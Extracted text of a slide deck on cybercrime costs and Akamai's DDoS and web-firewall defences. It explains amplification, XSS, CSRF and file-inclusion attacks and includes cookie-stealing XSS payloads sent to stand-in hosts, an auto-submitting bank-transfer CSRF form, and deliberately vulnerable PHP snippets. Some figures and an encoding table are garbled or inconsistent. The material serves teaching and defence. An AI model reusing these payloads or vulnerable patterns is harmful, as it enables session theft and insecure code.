Internet Security and Akamai s Solutions Preview of internet security today and how Akamai as cloud service provider mitigates attacks
Agenda How much is the cost? The most costly causes Denial of Services Web Attacks Akamai s solutions
How much is the cost? 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Ponemon Institute October 2013 Annualized cost of cyber crime Minimum : $1.3 million Maximum : $5.8 million Average : $8.9 million Increase 26% from 2012 Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf
The most costly causes 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Ponemon Institute October 2013 Denial of Services Web-based attacks Malicious code account for more than 55 percent of all cyber crime costs per organization on an annual basis Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf
Denial of Services What is it? DDoS Akamai s solutions
Denial of Services : What is it? Intention : intended users not able to access service(s) Mode : exploit infrastructure limitations such as network bandwidth, maximum connections, memory and CPU resources, exploit protocol limitations Characteristics : burst of packet data
Denial of Services : Real-life Case
Denial of Services : DDoS attack
Denial of Services : Amplification
Denial of Services : DNS attack DNS server attacks, based on its characteristics : DNS relies on the Universal Datagram Protocol (UDP), a connectionless protocol that doesn t validate source IP addresses, which makes these addresses easy to forge. A small DNS request can solicit large amounts of data in a response.
Akamai s Solutions for DoS
Akamai s Solutions for DoS Distributed Perimeters : harder to burst Filtering packet data and only forwarding legitimate packet to server Network-layer control : drop network-layer DDoS attacks, define and enforce IP whitelists/blacklist Adaptive Rate control : application layer DoS
Web Attacks : SQL injection SQL Injection, where bogus database queries are used to overwhelm or infiltrate critical applications and databases
Web Attacks : SQL Injection Exploits nonsanitized input in application, to execute malicious SQL query
Web Attacks : Cross Site Scripting allow attackers to enter a script that is then executed in the user's browser, for example to steal cookie
Web Attacks : Cross Site Scripting Sample input into guestbook, forum, private message <SCRIPT type="text/javascript"> var adr = '../evil.php?cakemonster=' + escape(document.cookie); </SCRIPT>
XSS "><a href="#" onclick="document.location='http://yoursite.com/what everyouwant.php?cookie=' +escape(document.cookie);"><click Me></a></script> Source : http://www.go4expert.com/articles/stealing-cookie-xss-t17066/
Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host
Web Attacks : CSRF Scheme
Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host POST http://bank.com/transfer.do HTTP/1.1 acct=bob&amount=100
Web Attacks : CSRF Combined with social engineering, to trick legitimate users to execute certain actions in target host <form action="http://bank.com/transfer.do" method="post"> <input type="hidden" name="acct" value="maria"/> <input type="hidden" name="amount" value="100000"/> <input type="submit" value="view my pictures"/> </form> <body onload="document.forms[0].submit()"> <form...
Akamai s Solutions for Web Attacks Kona Site Defender with Web Application Firewall performs a 'deep inspection' of every request and response in every common form of Web traffic Kona Rules: Akamai s Threat Intelligence Team develops and updates WAF rules continually to address new and emerging web application attacks, such as SQL injections, cross-site scripting, remote file inclusion and more.
Akamai s Solutions for Web Attacks Application-Layer Controls: A collection of predefined, configurable application-layer firewall rules address categories such as Protocol Violations, Request Limit Violations, HTTP Policy Violations
To Attack Methods
Biggest saving from security technologies 2013 Cost of Cyber Crime Study: United States Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf Benchmark Study of U.S. Companies Ponemon Institute October 2013
Average days to resolve attack 2013 Cost of Cyber Crime Study: United States Benchmark Study of U.S. Companies Source : http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf Ponemon Institute October 2013
Remote File Injection <?php // define $authorized = true only if user is authenticated if (authenticated_user()) { $authorized = true; } // Because we didn't first initialize $authorized as false, this might be // defined through register_globals, like from GET auth.php?authorized=1 // So, anyone can be seen as authenticated! if ($authorized) { include "/highly/sensitive/data.php"; }?>
Remote File Injection <?php $color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; require( $color. '.php' );?>
CSRF prevention with Synchronizer Token <form action="/transfer.do" method="post"> <input type="hidden" name="csrftoken" value="owy4nmqwode4odrjn2q2ntlhmmzlywe... wyzu1ywqwmtvhm2jmngyxyjjimgi4mjjjzde1zdz... MGYwMGEwOA=="> </form>
How WAF prevents CSRF A random token is added to every form as it streams through the firewall and is validated on the requests. This builds on the unique strengths of the Application Firewall to do in-line parsing of html to store all the links and forms sent to the client in that session. The firewall can thus validate all form fields against a stored signature to ensure no fields are added or tampered with
How to prevent XSS First of all, encode all <, >, and. This should be the first step of your XSS filter. See encoding below: & > & < > < > > > > " > ' / > /
Amplification Attacks DNS server attacks, based on its characteristics : DNS relies on the Universal Datagram Protocol (UDP), a connectionless protocol that doesn t validate source IP addresses, which makes these addresses easy to forge. A small DNS request can solicit large amounts of data in a response. NTP attacks Using UDP-based protocol that is prone to amplification attacks monlist command : 234 bytes could yield a response of 100 packets for a total more than 48K an amplification factor of 206x
SYN flood Source : https://www.usenix.org/legacy/events/bsdcon02/full_papers/lemon/lemon_html/node2.html
Widescreen Test Pattern (16:9) Aspect Ratio Test (Should appear circular) 4x3 16x9